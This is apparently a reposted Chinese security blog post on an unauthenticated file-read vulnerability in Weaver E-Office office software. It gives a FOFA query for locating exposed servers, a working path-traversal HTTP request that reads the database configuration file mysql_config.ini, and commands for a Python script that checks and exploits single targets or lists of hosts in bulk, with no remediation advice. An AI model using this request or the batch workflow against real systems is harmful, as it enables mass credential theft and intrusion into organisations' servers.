聲明：該文章由作者（Luckygirl.007）發(fā)表，轉(zhuǎn)載此文章須經(jīng)作者同意并請附上出處(0XUCN)及本頁鏈接。。

泛微E-Office是一款企業(yè)級的全流程辦公自動化軟件，它包括協(xié)同辦公、文檔管理、知識管理、工作流管理等多個模塊，涵蓋了企業(yè)日常工作中的各個環(huán)節(jié)。泛微E-Office能夠幫助企業(yè)實現(xiàn)全流程數(shù)字化、自動化，提高工作效率和管理質(zhì)量，降低管理成本，為企業(yè)提供全面、高效、便捷的辦公服務(wù)。

泛微E-Office前臺文件讀取漏洞。

二、網(wǎng)絡(luò)空間搜索引擎查詢

fofa查詢

app=“泛微-EOffice”

三、漏洞復(fù)現(xiàn)

poc

GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length:?0

瀏覽器直接訪問返回如下

四、批量檢測與利用

單個檢測與利用

python .\E-OfficeReadfile.py -u http://ip:port

批量檢測

python .\E-OfficeReadfile.py -f filename

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級服務(wù)市場：https://www.ijiandao.com/